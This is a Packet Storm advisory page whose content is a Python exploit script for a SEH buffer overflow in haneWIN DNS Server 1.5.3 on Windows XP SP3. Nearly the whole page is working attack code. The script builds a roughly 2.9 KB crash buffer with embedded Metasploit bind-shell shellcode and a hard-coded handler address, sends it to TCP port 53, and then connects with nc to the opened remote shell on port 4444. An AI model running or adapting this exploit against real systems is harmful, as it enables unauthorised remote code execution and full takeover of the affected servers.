haneWIN DNS Server 1.5.3 Buffer Overflow

2014-01-29T00:00:00
ID PACKETSTORM:124995
Type packetstorm
Reporter Dario Estrada
Modified 2014-01-29T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
  
# Exploit Title: haneWIN DNS Server (SEH)  
# Author: Dario Estrada (dash) https://intrusionlabs.org  
# Date: 2014-01-29  
# Version: haneWIN DNS Server 1.5.3  
# Vendor Homepage: http://www.hanewin.net/  
# Vulnerable app link:http://www.hanewin.net/dns-e.htm  
# Tested on: Windows XP SP3  
# Thanks to God, to my family and all my friends for always being there  
#  
# Description:  
# A SEH overflow occurs when a large amount of data (this PoC sends ~2.9 KB, with the SEH record overwritten 2324 bytes in) is sent to the server's TCP port 53
#  
import os
import socket
import struct
import subprocess
import sys
import time
  
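# --- Crash-buffer layout (from the original author's testing on XP SP3) ------
# Every number below is target-specific: the SEH offset and the handler address
# were measured against haneWIN DNS Server 1.5.3 on Windows XP SP3 and will not
# line up against a different build or OS without being re-derived.
SEH_OFFSET = 2324          # bytes from the start of the buffer to the nSEH field
TARGET_PORT = 53           # haneWIN accepts DNS over TCP on this port
BIND_SHELL_PORT = 4444     # port windows/shell_bind_tcp listens on once it runs
TRIGGER_DELAY = 5          # seconds to give the payload before connecting to it
TAIL_PADDING = 600         # extra bytes after the jump so the overwrite is long enough

# msfpayload windows/shell_bind_tcp R | msfencode -t c -b '\x00\xff\x0a\x0d'
SHELLCODE = (
    b"\xb8\xdf\x64\x04\x29\xd9\xc7\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"
    b"\x56\x31\x45\x13\x83\xed\xfc\x03\x45\xd0\x86\xf1\xd5\x06\xcf"
    b"\xfa\x25\xd6\xb0\x73\xc0\xe7\xe2\xe0\x80\x55\x33\x62\xc4\x55"
    b"\xb8\x26\xfd\xee\xcc\xee\xf2\x47\x7a\xc9\x3d\x58\x4a\xd5\x92"
    b"\x9a\xcc\xa9\xe8\xce\x2e\x93\x22\x03\x2e\xd4\x5f\xeb\x62\x8d"
    b"\x14\x59\x93\xba\x69\x61\x92\x6c\xe6\xd9\xec\x09\x39\xad\x46"
    b"\x13\x6a\x1d\xdc\x5b\x92\x16\xba\x7b\xa3\xfb\xd8\x40\xea\x70"
    b"\x2a\x32\xed\x50\x62\xbb\xdf\x9c\x29\x82\xef\x11\x33\xc2\xc8"
    b"\xc9\x46\x38\x2b\x74\x51\xfb\x51\xa2\xd4\x1e\xf1\x21\x4e\xfb"
    b"\x03\xe6\x09\x88\x08\x43\x5d\xd6\x0c\x52\xb2\x6c\x28\xdf\x35"
    b"\xa3\xb8\x9b\x11\x67\xe0\x78\x3b\x3e\x4c\x2f\x44\x20\x28\x90"
    b"\xe0\x2a\xdb\xc5\x93\x70\xb4\x2a\xae\x8a\x44\x24\xb9\xf9\x76"
    b"\xeb\x11\x96\x3a\x64\xbc\x61\x3c\x5f\x78\xfd\xc3\x5f\x79\xd7"
    b"\x07\x0b\x29\x4f\xa1\x33\xa2\x8f\x4e\xe6\x65\xc0\xe0\x58\xc6"
    b"\xb0\x40\x08\xae\xda\x4e\x77\xce\xe4\x84\x0e\xc8\x2a\xfc\x43"
    b"\xbf\x4e\x02\x72\x63\xc6\xe4\x1e\x8b\x8e\xbf\xb6\x69\xf5\x77"
    b"\x21\x91\xdf\x2b\xfa\x05\x57\x22\x3c\x29\x68\x60\x6f\x86\xc0"
    b"\xe3\xfb\xc4\xd4\x12\xfc\xc0\x7c\x5c\xc5\x83\xf7\x30\x84\x32"
    b"\x07\x19\x7e\xd6\x9a\xc6\x7e\x91\x86\x50\x29\xf6\x79\xa9\xbf"
    b"\xea\x20\x03\xdd\xf6\xb5\x6c\x65\x2d\x06\x72\x64\xa0\x32\x50"
    b"\x76\x7c\xba\xdc\x22\xd0\xed\x8a\x9c\x96\x47\x7d\x76\x41\x3b"
    b"\xd7\x1e\x14\x77\xe8\x58\x19\x52\x9e\x84\xa8\x0b\xe7\xbb\x05"
    b"\xdc\xef\xc4\x7b\x7c\x0f\x1f\x38\x8c\x5a\x3d\x69\x05\x03\xd4"
    b"\x2b\x48\xb4\x03\x6f\x75\x37\xa1\x10\x82\x27\xc0\x15\xce\xef"
    b"\x39\x64\x5f\x9a\x3d\xdb\x60\x8f"
)

# nSEH: "jmp short +6" (EB 06) hops over the SEH pointer; two NOPs fill the slot.
NSEH = b"\xeb\x06\x90\x90"
# SEH: hard-coded handler address 0x7ffc07d1 taken from the author's XP SP3 box —
# presumably a pop/pop/ret gadget (not verifiable from this file). It must be
# re-found for any other target; nothing here adapts it.
SEH = b"\xd1\x07\xfc\x7f"
# Near jump (E9 rel32) that the short jump lands on. Its rel32 is measured from
# the end of the 5-byte instruction, which sits at SEH_OFFSET + 4 + 4 + 5 = 2337,
# so -2337 lands exactly at offset 0: the start of SHELLCODE. Computing it from
# SEH_OFFSET keeps the two in sync; for the original layout this packs to
# b"\xe9\xdf\xf6\xff\xff", byte-for-byte what the original script hard-coded.
JMP_BACK = struct.pack("<Bi", 0xE9, -(SEH_OFFSET + len(NSEH) + len(SEH) + 5))


def build_payload(shellcode=SHELLCODE):
    """Assemble the crash buffer sent to the DNS server.

    Layout: shellcode, 'A' filler up to the SEH record, nSEH, SEH, the jump back
    to offset 0, then TAIL_PADDING bytes of 'A'.

    Args:
        shellcode: raw payload bytes placed at the very start of the buffer.

    Returns:
        The complete buffer as bytes.

    Raises:
        ValueError: if *shellcode* does not fit in front of the SEH record. The
            original script silently produced a misaligned buffer in that case,
            because ``'A' * negative`` is just ``''``.
    """
    if len(shellcode) > SEH_OFFSET:
        raise ValueError(
            "shellcode is %d bytes; at most %d fit before the SEH record"
            % (len(shellcode), SEH_OFFSET)
        )
    filler = b"A" * (SEH_OFFSET - len(shellcode))
    return b"".join([shellcode, filler, NSEH, SEH, JMP_BACK, b"A" * TAIL_PADDING])


def send_payload(host, payload, port=TARGET_PORT):
    """Deliver *payload* to host:port over a single TCP connection.

    Uses sendall() rather than send(): the buffer is ~2.9 KB and a single
    send() may legitimately write only part of it, which would leave the
    server with a truncated, non-crashing request. The socket is always closed.

    Raises:
        socket.error: on any connect/send failure (OSError on Python 3).
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((host, port))
        sock.sendall(payload)
    finally:
        sock.close()


def attach_shell(host, port=BIND_SHELL_PORT):
    """Run ``nc -n <host> <port>`` in the foreground and return its exit status.

    The command is passed as an argv list (no shell), so the host string from
    the command line cannot inject shell metacharacters the way the original
    ``os.system("nc -n " + host + " 4444")`` allowed. If nc is not installed,
    an error is printed and 1 is returned instead of raising.
    """
    try:
        return subprocess.call(["nc", "-n", host, str(port)])
    except OSError as exc:
        print("[!] Could not run nc: %s" % exc)
        return 1


def main(argv=None):
    """Command-line entry point: ``<script> <host>``.

    Sends the crash buffer to host:TARGET_PORT, waits TRIGGER_DELAY seconds for
    the bind shell to come up, then hands the terminal to nc.

    Args:
        argv: argument vector; defaults to sys.argv.

    Returns:
        Exit status: 0 when usage is printed, 1 if the payload could not be
        delivered (the original exited 0 on that path, hiding the failure from
        any wrapper script), otherwise nc's exit status.
    """
    args = sys.argv if argv is None else argv
    if len(args) < 2:
        print("\n Usage: " + args[0] + " <host> \n")
        return 0
    host = args[1]
    payload = build_payload()

    print("[+] Connecting to %s:%d" % (host, TARGET_PORT))
    print("[*] Sending payload.. shellcode: %d" % len(SHELLCODE))
    # Only the network step is guarded, and only for socket errors; the original
    # bare ``except:`` also swallowed KeyboardInterrupt and failures from nc and
    # reported every one of them as "Could not connect".
    try:
        send_payload(host, payload)
    except socket.error as exc:
        print("[!] Could not connect to %s:%d (%s)\r" % (host, TARGET_PORT, exc))
        return 1
    print("[*] Exploit Sent Successfully!")
    print("[+] Waiting for %d sec before spawning shell to %s:%d\r"
          % (TRIGGER_DELAY, host, BIND_SHELL_PORT))
    time.sleep(TRIGGER_DELAY)
    return attach_shell(host)


if __name__ == "__main__":
    sys.exit(main())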
`